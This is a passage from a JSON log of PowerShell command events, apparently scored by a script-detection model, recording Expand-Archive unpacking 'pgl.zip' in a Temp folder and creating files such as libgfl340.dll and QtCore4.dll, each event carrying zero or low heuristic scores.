value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"4\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181176", "time": {"SystemTime": "2024-10-18T10:27:47.8067265Z"}, "totalscore": {"totalscore": 50.11374718716317, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 50.11374718716317, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"dbmx\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"dbmx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5011374718716317, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181177", "time": {"SystemTime": "2024-10-18T10:27:47.8173243Z"}, "totalscore": {"totalscore": 83.51135370862393, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 83.51135370862393, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8351135370862393, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181178", "time": {"SystemTime": "2024-10-18T10:27:47.8181158Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181179", "time": {"SystemTime": "2024-10-18T10:27:47.9206178Z"}, "totalscore": {"totalscore": 65.02337080128558, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.02337080128558, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\dbmx'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6502337080128558, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181181", "time": {"SystemTime": "2024-10-18T10:27:48.5158932Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181183", "time": {"SystemTime": "2024-10-18T10:27:48.5163332Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"5\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"5\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181184", "time": {"SystemTime": "2024-10-18T10:27:48.5172012Z"}, "totalscore": {"totalscore": 50.11374718716317, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 50.11374718716317, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"hgop\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"hgop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5011374718716317, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181185", "time": {"SystemTime": "2024-10-18T10:27:48.5184426Z"}, "totalscore": {"totalscore": 83.51135370862393, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 83.51135370862393, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8351135370862393, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181186", "time": {"SystemTime": "2024-10-18T10:27:48.5191085Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181187", "time": {"SystemTime": "2024-10-18T10:27:48.5229430Z"}, "totalscore": {"totalscore": 65.02337080128558, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 65.02337080128558, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\hgop'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.6502337080128558, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181189", "time": {"SystemTime": "2024-10-18T10:27:52.4045593Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181191", "time": {"SystemTime": "2024-10-18T10:27:52.4049167Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"6\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"6\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181192", "time": {"SystemTime": "2024-10-18T10:27:52.4058846Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"libgfl340.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"libgfl340.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181193", "time": {"SystemTime": "2024-10-18T10:27:52.4066649Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181194", "time": {"SystemTime": "2024-10-18T10:27:52.4182697Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181195", "time": {"SystemTime": "2024-10-18T10:27:52.4405916Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\libgfl340.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181197", "time": {"SystemTime": "2024-10-18T10:27:55.9525182Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"1\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181199", "time": {"SystemTime": "2024-10-18T10:27:55.9532947Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"7\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"7\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181200", "time": {"SystemTime": "2024-10-18T10:27:55.9553423Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtAV1.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtAV1.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181201", "time": {"SystemTime": "2024-10-18T10:27:55.9565179Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181202", "time": {"SystemTime": "2024-10-18T10:27:55.9572816Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "removed_backtick": "CommandInvocation(Test-Path): \"Test-Path\"\nParameterBinding(Test-Path): name=\"LiteralPath\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\"\nParameterBinding(Test-Path): name=\"PathType\"; value=\"Container\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.524204795099748, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181203", "time": {"SystemTime": "2024-10-18T10:27:55.9849539Z"}, "totalscore": {"totalscore": 72.7217257066981, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 72.7217257066981, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll'.\"\n", "removed_backtick": "CommandInvocation(Write-Verbose): \"Write-Verbose\"\nParameterBinding(Write-Verbose): name=\"Message\"; value=\"Created 'C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtAV1.dll'.\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.7272172570669809, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181205", "time": {"SystemTime": "2024-10-18T10:27:57.5557658Z"}, "totalscore": {"totalscore": 41.949542063429696, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.949542063429696, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "removed_backtick": "CommandInvocation(Write-Progress): \"Write-Progress\"\nParameterBinding(Write-Progress): name=\"Activity\"; value=\"Expand-Archive\"\nParameterBinding(Write-Progress): name=\"Status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(Write-Progress): name=\"PercentComplete\"; value=\"2\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41949542063429696, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181207", "time": {"SystemTime": "2024-10-18T10:27:57.5561912Z"}, "totalscore": {"totalscore": 41.747568953150854, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 41.747568953150854, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"8\"\n", "removed_backtick": "CommandInvocation(ProgressBarHelper): \"ProgressBarHelper\"\nParameterBinding(ProgressBarHelper): name=\"cmdletName\"; value=\"Expand-Archive\"\nParameterBinding(ProgressBarHelper): name=\"status\"; value=\"The archive file 'C:\\Users\\admin\\AppData\\Local\\Temp\\pgl.zip' expansion is in progress...\"\nParameterBinding(ProgressBarHelper): name=\"previousSegmentWeight\"; value=\"0\"\nParameterBinding(ProgressBarHelper): name=\"currentSegmentWeight\"; value=\"100\"\nParameterBinding(ProgressBarHelper): name=\"totalNumberofEntries\"; value=\"514\"\nParameterBinding(ProgressBarHelper): name=\"currentEntryCount\"; value=\"8\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.41747568953150854, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181208", "time": {"SystemTime": "2024-10-18T10:27:57.5568818Z"}, "totalscore": {"totalscore": 56.33757794135137, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 56.33757794135137, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtCore4.dll\"\n", "removed_backtick": "CommandInvocation(Join-Path): \"Join-Path\"\nParameterBinding(Join-Path): name=\"Path\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\\"\nParameterBinding(Join-Path): name=\"ChildPath\"; value=\"QtCore4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.5633757794135137, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181209", "time": {"SystemTime": "2024-10-18T10:27:57.5585338Z"}, "totalscore": {"totalscore": 87.06574060513687, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 87.06574060513687, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll\"\n", "removed_backtick": "CommandInvocation(New-Object): \"New-Object\"\nParameterBinding(New-Object): name=\"TypeName\"; value=\"System.IO.FileInfo\"\nParameterBinding(New-Object): name=\"ArgumentList\"; value=\"C:\\Users\\admin\\AppData\\Local\\Temp\\file\\QtCore4.dll\"\n", "error": {}, "detect_iex": false, "url_result": [], "detect_sign": 0, "logistic_reg": 0.8706574060513687, "randomized_string": 0, "detect_strings_blacklist": []}, {"eventrecid": "1181210", "time": {"SystemTime": "2024-10-18T10:27:57.5593290Z"}, "totalscore": {"totalscore": 52.420479509974804, "score": {"detect_iex": 0, "url_result": 0, "detect_sign": 0, "logistic_reg": 52.420479509974804, "randomized_string": 0, "detect_strings_blacklist": 0}}, "sourcecode": "CommandInvocation(Test-Path): 